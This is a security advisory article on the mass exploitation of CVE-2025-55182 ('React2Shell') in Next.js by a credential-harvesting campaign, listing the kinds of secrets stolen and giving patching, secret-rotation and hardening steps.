React2Shell Under Mass Exploitation: 766+ Next.js Hosts Breached in Credential Harvesting Campaign

A large-scale automated credential harvesting campaign is actively exploiting CVE-2025-55182, the critical pre-authentication remote code execution vulnerability in React Server Components known as React2Shell. Researchers have confirmed at least 766 compromised hosts across multiple cloud providers and geographic regions, with the operation showing no signs of slowing down.

The Vulnerability

CVE-2025-55182 carries a maximum CVSS score of 10.0. The flaw affects React Server Components as implemented in Next.js and related frameworks, allowing remote unauthenticated attackers to achieve arbitrary code execution. The vulnerability was initially disclosed and patched in late 2025, with Microsoft publishing detailed defense guidance in December 2025. Despite patches being available for months, a significant number of internet-facing deployments remain unpatched.

The Campaign: UAT-10608

The threat cluster, tracked as UAT-10608, is running a highly automated operation. The attackers use scanning infrastructure — likely leveraging services like Shodan, Censys, or custom-built scanners — to identify Next.js applications exposed to the internet that remain vulnerable to React2Shell.

Once initial access is achieved through the RCE, the attackers deploy automated scripts and a purpose-built framework called NEXUS Listener to systematically harvest credentials and secrets from compromised hosts. NEXUS Listener includes a web-based GUI that provides operators with precompiled statistics on credentials harvested and hosts compromised, suggesting this is an organized, professionally operated campaign rather than opportunistic scanning.

What’s Being Stolen

The scope of credential theft is extensive. Confirmed exfiltrated data types include:

• Cloud credentials: AWS access keys and secrets
• Code repository tokens: GitHub and GitLab personal access tokens
• Database connection strings: Full connection URIs with embedded credentials
• SSH private keys: Enabling lateral movement across infrastructure
• Payment processing keys: Stripe API keys
• AI platform credentials: OpenAI and Anthropic API keys
• Messaging tokens: Telegram bot credentials and webhook secrets
• Shell command history: Potentially revealing additional infrastructure details and credentials

The attackers are essentially vacuuming up every secret they can find in environment variables, configuration files, and dotfiles on compromised hosts.

Impact Assessment

This campaign is particularly dangerous for several reasons. First, the vulnerability requires no authentication — any internet-facing Next.js application running a vulnerable version is a target. Second, the automated nature means the attackers can scale quickly. Third, the stolen credentials create a cascading risk: compromised AWS keys can lead to full cloud account takeover, stolen GitHub tokens can enable supply chain attacks, and exfiltrated database credentials can expose customer data.

Organizations running Next.js in production — particularly those with server-side rendering or React Server Components enabled — should treat this as an urgent priority. Google Cloud’s threat intelligence team and multiple security vendors have published analyses confirming the campaign’s scope and sophistication.

Mitigation Steps

Immediate actions:

1. Patch Now. Update Next.js to a version that addresses CVE-2025-55182. If you’re still running a vulnerable version months after disclosure, this is a critical-priority upgrade.
2. Rotate all secrets on any host that may have been exposed. This means AWS keys, database passwords, API tokens, SSH keys — everything. Assume compromise if your application was internet-facing and unpatched.
3. Audit access logs for your cloud providers, code repositories, and payment platforms for unauthorized access using potentially stolen credentials.
4. Check for IOCs. Look for connections to known NEXUS Listener C2 infrastructure. Review process execution logs for unexpected script activity following web application exploitation.

Longer-term hardening:

• Never store secrets in environment variables or .env files on production servers. Use a secrets manager (AWS Secrets Manager, HashiCorp Vault, etc.).
• Implement network segmentation so that a compromised web application cannot reach internal services or metadata endpoints.
• Deploy a WAF with virtual patching rules for CVE-2025-55182 as a defense-in-depth measure.
• Monitor for anomalous outbound connections from web application servers.

References

• Hackers Exploit CVE-2025-55182 to Breach 766 Next.js Hosts, Steal Credentials — The Hacker News
• Multiple Threat Actors Exploit React2Shell (CVE-2025-55182) — Google Cloud Threat Intelligence
• React2Shell Exploited in Large-Scale Credential Harvesting Campaign — SecurityWeek
• Defending Against CVE-2025-55182 (React2Shell) — Microsoft Security Blog
• React2Shell (CVE-2025-55182): Critical React Vulnerability — Wiz